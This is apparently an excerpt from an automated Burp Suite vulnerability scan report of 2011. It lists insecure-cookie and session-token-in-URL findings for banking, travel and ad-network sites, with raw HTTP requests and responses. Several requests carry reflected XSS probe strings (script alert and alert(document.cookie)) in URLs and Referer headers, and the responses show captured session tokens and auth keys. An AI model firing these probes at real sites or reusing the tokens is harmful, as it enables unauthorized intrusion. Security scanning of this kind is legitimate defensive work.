<head><title>Wachovia to Wells Fargo Inter
...[SNIP]...

10.161. https://www.zionsbank.com/ichecking_landing.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.zionsbank.com
Path:   /ichecking_landing.jsp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ichecking_landing.jsp HTTP/1.1
Host: www.zionsbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 03 Feb 2011 15:55:18 GMT
Content-type: text/html;charset=ISO-8859-1
Connection: close
Set-Cookie: lid=32f0cfc6e213a410d7efcde3f83e508b;path=/;domain=.zionsbank.com;
Set-Cookie: plid=6ee7930a72c58f63c025e4f8bc6c26a4;expires=Fri, 03-Feb-2012 15:55:18 GMT;path=/;domain=.zionsbank.com;

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">


<html lang="en">

<head>
<!-- Google Website Optimi
...[SNIP]...

10.162. https://www134.americanexpress.com/consumertravel/travel.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www134.americanexpress.com
Path:   /consumertravel/travel.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /consumertravel/travel.do HTTP/1.1
Host: www134.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 14:07:32 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742052409531; path=/; expires=Sun, 07-Feb-16 14:07:32 GMT; domain=.americanexpress.com
Location: https://axptravel.americanexpress.com/consumertravel/travel.do
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US


10.163. https://www152.americanexpress.com/premium/credit-card-travel-insurance/home.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www152.americanexpress.com
Path:   /premium/credit-card-travel-insurance/home.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /premium/credit-card-travel-insurance/home.do HTTP/1.1
Host: www152.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Perminantly
Date: Thu, 03 Feb 2011 14:07:33 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742053028698; path=/; expires=Sun, 07-Feb-16 14:07:33 GMT; domain=.americanexpress.com
Location: https://www295.americanexpress.com/premium/credit-card-travel-insurance/home.do
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US


10.164. https://www209.americanexpress.com/merchant/mainpagedom/authreg_showMainpage.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www209.americanexpress.com
Path:   /merchant/mainpagedom/authreg_showMainpage.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /merchant/mainpagedom/authreg_showMainpage.do HTTP/1.1
Host: www209.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 14:08:20 GMT
Server: IBM_HTTP_Server
Cache-Control: no-store
Location: https://www209.americanexpress.com/merchant/mainpagedom/jumppage.jsp?TYPE=33554432&REALMOID=06-36577fc6-fad0-100d-9cef-80f7dddcfc95&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=$SM$igR5UgqAztly2benjPhgw8%2bn1VWKCX1bCZfPwEgJ%2fJkIgErkX7L%2bPcd4oYgdRXKQ&TARGET=$SM$https%3a%2f%2fwww209%2eamericanexpress%2ecom%2fmerchant%2fmainpagedom%2fauthreg_showMainpage%2edo
Content-Length: 655
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerwww309-443=369887754.47873.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www209.americanexpress.com/merchant/mai
...[SNIP]...

10.165. https://www217.americanexpress.com/cards/home.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www217.americanexpress.com
Path:   /cards/home.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cards/home.do HTTP/1.1
Host: www217.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Perminantly
Date: Thu, 03 Feb 2011 14:08:30 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742110979749; path=/; expires=Sun, 07-Feb-16 14:08:30 GMT; domain=.americanexpress.com
Location: https://www295.americanexpress.com/cards/home.do
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US


10.166. https://www217.americanexpress.com/cards/shopping/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www217.americanexpress.com
Path:   /cards/shopping/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cards/shopping/index.jsp HTTP/1.1
Host: www217.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Perminantly
Date: Thu, 03 Feb 2011 14:08:34 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742114367376; path=/; expires=Sun, 07-Feb-16 14:08:34 GMT; domain=.americanexpress.com
Location: https://www295.americanexpress.com/cards/shopping/index.jsp
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US


11. Session token in URL  previous  next
There are 193 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


11.1. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /bh/set.aspx?action=add&advid=1518&token=FOCI1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F02%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web82
Set-Cookie: V=gFEcJzqCjXJj; Domain=.contextweb.com; Expires=Sun, 29-Jan-2012 16:31:31 GMT; Path=/
Set-Cookie: cwbh1=2709%3B03%2F02%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F05%2F2011%3BFOCI1; Domain=.contextweb.com; Expires=Fri, 08-Jan-2016 16:31:31 GMT; Path=/
Content-Type: image/gif
Date: Thu, 03 Feb 2011 16:31:30 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

11.2. http://c.chango.com/collector/am/pixel  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://c.chango.com
Path:   /collector/am/pixel

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /collector/am/pixel?url=http%3A%2F%2Ftag.admeld.com%2Fmatch%3Fadmeld_adprovider_id%3D333%26external_user_id%3D2d1cbd00-2b4b-11e0-9a94-00259009a9c2&amid=6acccca4-d0e4-464e-a824-f67cb28d5556&token=2d1cbd00-2b4b-11e0-9a94-00259009a9c2&pageURL=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F80%2Faccuweather%2F300x250%2Faccuweather_btf%3Ft%3D1296847504442%26tz%3D360%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fhurricane.accuweather.com%252Fhurricane%252Findex.asp%253F722b7%252522%25253E%25253Cscript%25253Ealert%28document.cookie%29%25253C%252Fscript%25253E9e1b639a6b3%253D1%26refer%3Dhttp%253A%252F%252Fburp%252Fshow%252F82&referrer=http%3A%2F%2Fhurricane.accuweather.com%2Fhurricane%2Findex.asp%3F722b7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E9e1b639a6b3%3D1 HTTP/1.1
Host: c.chango.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/300x250/accuweather_btf?t=1296847504442&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhurricane.accuweather.com%2Fhurricane%2Findex.asp%3F722b7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E9e1b639a6b3%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F82
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_t=1; _i_tm=1; _i_ox=1; _i_ab=1; _i_gid=1; _i_sl=1; _t=2d1cbd00-2b4b-11e0-9a94-00259009a9c2; _i_admeld=1

Response

HTTP/1.1 302 Found
Date: Fri, 04 Feb 2011 19:23:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 0
Location: http://tag.admeld.com/match?admeld_adprovider_id=333&external_user_id=2d1cbd00-2b4b-11e0-9a94-00259009a9c2
Server: TornadoServer/1.1


11.3. http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://daffodil.acsevents.org
Path:   /site/TR/DaffodilDays/DDFY10Pennsylvania

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /site/TR/DaffodilDays/DDFY10Pennsylvania?pg=entry&fr_id=26972 HTTP/1.1
Host: daffodil.acsevents.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:04:39 GMT
Server: Apache
Cache-Control: private
Set-Cookie: JServSessionIdr004=ba6gnf15v1.app325a; domain=.acsevents.org; path=/
Keep-Alive: timeout=8, max=493
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 31844

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>


<base href="http://daffodil.acsevents.org/site/" />


<title>The American Cancer Society: </title>
<meta http-equiv="Co
...[SNIP]...
<td class="topnavLinkCell" align="left" title="Become a Coordinator"
onmouseover="mouseoverNavLineItem(this);"
onmouseout="mouseoutNavLineItem(this);"
onclick="clickLinkInTableCell(this);">
<a tabindex="" onclick="return false;"
onfocus="focusNavLineItem(this);"
onblur="blurNavLineItem(this);"
class="topnavLinkCellLink" href="https://secure3.convio.net/tacs/site/TRR/DaffodilDays/DDFY10Pennsylvania?JServSessionIdr004=ba6gnf15v1.app325a&amp;pg=ptype&amp;fr_id=26972">
Become a Coordinator</a>
...[SNIP]...

11.4. http://dev.virtualearth.net/services/v1/ImageryMetadataService/ImageryMetadataService.asmx/GetBirdsEyeSceneByLocation  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://dev.virtualearth.net
Path:   /services/v1/ImageryMetadataService/ImageryMetadataService.asmx/GetBirdsEyeSceneByLocation

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /services/v1/ImageryMetadataService/ImageryMetadataService.asmx/GetBirdsEyeSceneByLocation?latitude=39.95448399067298&longitude=-75.18206790089607&level=20&spinDirection=%22NoSpin%22&orientation=%22North%22&token=RGBdU6R4GBImcYmepJZCuPc-P0ApKvan6CIRb_VBHpv7BOlE5AlS1J65xSZmZSy3C-3K_wv_hUyFJXQWMj1bvQ2&culture=%22en-us%22&format=json&rid=1296730383991& HTTP/1.1
Host: dev.virtualearth.net
Proxy-Connection: keep-alive
Referer: http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=La5aa7%22-alert(1)-%22e8f7aa23d76&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-BM-TraceID: 9a0832e328e04f2ab84af26f2ba259e7
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001310
X-MS-BM-WS-INFO: 0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:38:07 GMT
Content-Length: 1150

function _f1296730383991(){return {"d":{"__type":"Microsoft.VirtualEarth.Engines.Core.ImageryMetadata.PublicTypes.BirdsEyeSearchResponse","Scene":{"S":35778879,"O":0,"Q":"03201010322","RI":36815,"L":2
...[SNIP]...

11.5. http://dev.virtualearth.net/services/v1/geocodeservice/geocodeservice.asmx/Geocode  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://dev.virtualearth.net
Path:   /services/v1/geocodeservice/geocodeservice.asmx/Geocode

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /services/v1/geocodeservice/geocodeservice.asmx/Geocode?count=10&query=%2219101%22&landmark=&addressLine=&locality=&postalTown=&adminDistrict=&district=&postalCode=&countryRegion=&mapBounds=%2263.58767529470318,%20-63.720703125000014,%205.00339434502215,%20-129.63867187500003%22&currentLocation=&curLocAccuracy=&entityTypes=&rankBy=&token=RGBdU6R4GBImcYmepJZCuPc-P0ApKvan6CIRb_VBHpv7BOlE5AlS1J65xSZmZSy3C-3K_wv_hUyFJXQWMj1bvQ2&culture=%22en-us%22&format=json&rid=1296730153542& HTTP/1.1
Host: dev.virtualearth.net
Proxy-Connection: keep-alive
Referer: http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=La5aa7%22-alert(1)-%22e8f7aa23d76&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-BM-TraceID: 8c05997ab6484051ae3d93178592584e
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001310,BL2M001803,BL2M001802,BL2M001252,BL2M001820,BL2M001815
X-MS-BM-WS-INFO: 0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:38:06 GMT
Content-Length: 1580

function _f1296730153542(){return {"d":{"__type":"Microsoft.VirtualEarth.Engines.Core.Geocoding.GeocodingResponse","Results":[{"Name":"19101, PA","Type":132,"BestLocation":{"Precision":1,"Coordinates"
...[SNIP]...

11.6. http://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://dev.virtualearth.net
Path:   /webservices/v1/LoggingService/LoggingService.svc/Log

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /webservices/v1/LoggingService/LoggingService.svc/Log?entry=0&fmt=1&type=3&group=MapControl&name=AJAX&version=6.3c.20101212190742.04&session=1296727732182&mkt=en-us&auth=Ahn5L376ymB7iE0SUTiv0-mqke-onEds0hDyR5WF9uaGYphF-L3tsU6i7xcT-B5H&&jsonp=LogCredCB1296727990252& HTTP/1.1
Host: dev.virtualearth.net
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-BM-Srv: BL2M001306
X-MS-BM-WS-INFO: 0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:01:40 GMT
Content-Length: 155

LogCredCB1296727990252({"sessionId" : "AvAnHBF9C5FDPqa2lN3XMTgltO_Bc-zzMSxZpAVj9-YhWrde3iEosg0e1-cEUUu2", "authenticationResultCode" : "ValidCredentials"})

11.7. http://economy.ocregister.com/2011/02/03/o-c-in-top-three-for-job-growth/48434/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://economy.ocregister.com
Path:   /2011/02/03/o-c-in-top-three-for-job-growth/48434/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/02/03/o-c-in-top-three-for-job-growth/48434/ HTTP/1.1
Host: economy.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:04:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:01:32 +0000
Cache-Control: max-age=108, must-revalidate
X-Pingback: http://economy.ocregister.com/xmlrpc.php
Link: <http://economy.ocregister.com/?p=48434>; rel=shortlink
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.8. http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://fastfood.ocregister.com
Path:   /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/ HTTP/1.1
Host: fastfood.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:05:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:01:36 +0000
Cache-Control: max-age=87, must-revalidate
X-Pingback: http://fastfood.ocregister.com/xmlrpc.php
Link: <http://fastfood.ocregister.com/?p=86514>; rel=shortlink
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.9. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /activityi;src=2176035;type=hsbcb533;cat=hsbcb628;ord=1;num=8000465589575.47? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.us.hsbc.com/1/2/3/business?home=business
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Thu, 03 Feb 2011 18:42:16 GMT
Expires: Thu, 03 Feb 2011 18:42:16 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 2986

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- "HSBC" c/o "Neo
...[SNIP]...
<img src="https://ad.yieldmanager.com/pixel?id=1012943&id=1012994&id=103362&t=2" width="1" height="1" /><img src="https://bh.contextweb.com/bh/set.aspx?action=add&advid=522&token=HSBC1" width="1" height="1" border="0"></body>
...[SNIP]...

11.10. http://huntingtonhomes.ocregister.com/2011/02/02/trashed-h-b-house-on-good-morning-america/127042/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://huntingtonhomes.ocregister.com
Path:   /2011/02/02/trashed-h-b-house-on-good-morning-america/127042/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/02/02/trashed-h-b-house-on-good-morning-america/127042/ HTTP/1.1
Host: huntingtonhomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:05:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://huntingtonhomes.ocregister.com/xmlrpc.php
Link: <http://huntingtonhomes.ocregister.com/?p=127042>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 128370


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.11. http://huntingtonhomes.ocregister.com/2011/02/03/repod-green-home-is-back-on-the-market/127100/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://huntingtonhomes.ocregister.com
Path:   /2011/02/03/repod-green-home-is-back-on-the-market/127100/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/02/03/repod-green-home-is-back-on-the-market/127100/ HTTP/1.1
Host: huntingtonhomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:05:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://huntingtonhomes.ocregister.com/xmlrpc.php
Link: <http://huntingtonhomes.ocregister.com/?p=127100>; rel=shortlink
Last-Modified: Thu, 03 Feb 2011 19:05:43 +0000
Cache-Control: max-age=300, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.12. http://inyourface.ocregister.com/2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://inyourface.ocregister.com
Path:   /2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/ HTTP/1.1
Host: inyourface.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:05:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
Last-Modified: Thu, 03 Feb 2011 19:04:54 +0000
Cache-Control: max-age=245, must-revalidate
X-Pingback: http://inyourface.ocregister.com/xmlrpc.php
Link: <http://inyourface.ocregister.com/?p=25744>; rel=shortlink
Connection: close
Content-Type: text/html
Content-Length: 84762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.13. http://l.sharethis.com/pview  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&publisher=f1e9c8d0-3080-41f3-aa42-c74fedee948a&hostname=www.superpages.com&location=%2Fbp%2Fxmlproxyf53dc%2522-alert(document.cookie)-%2522b9a871a93d9&url=http%3A%2F%2Fwww.superpages.com%2Fbp%2Fxmlproxyf53dc%2522-alert(document.cookie)-%2522b9a871a93d9%3Furl%3Dhttp%253A%252F%252Fugc-int.superpages.com%252Fugcwiki%252FGetPhotoServlet%253FlistingId%253D2118363360&sessionID=1296749501634.96680&fpc=c5114f2-12dec4b1cc4-7f15d273-1&ts1296749504819.0&r_sessionID=&hash_flag=&shr=&count=1&refDomain=burp&refQuery=http%3A%2F%2Fburp%2Fshow%2F42 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/xmlproxyf53dc%22-alert(document.cookie)-%22b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=Cs8yN00nznknhnUGHGW1Ag==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
